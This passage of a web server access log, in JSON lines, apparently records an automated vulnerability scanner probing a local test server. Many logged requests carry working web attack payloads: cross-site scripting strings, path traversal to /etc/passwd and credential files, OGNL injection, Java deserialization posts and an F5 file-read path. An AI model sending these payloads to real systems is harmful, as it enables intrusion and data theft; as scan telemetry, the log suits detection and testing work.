/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jquery-file-upload/server/php/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wpdm-cache/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sso/v2/sso/jwt?error_url=http://evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.vscode/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/JMXInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/EJBInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SecMail/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/uploadify/fileList?type=.+&path=../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?c=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CDocuments+and+Settings\x5CAll+Users\x5CApplication+Data\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage.action?spaceKey=myproj HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CvCenterServer\x5Ccfg\x5Cvmware-vpx\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/templates2/viewpagetemplate.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/maint/repair.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22logfile\x22; filename=\x22\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.207","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:45 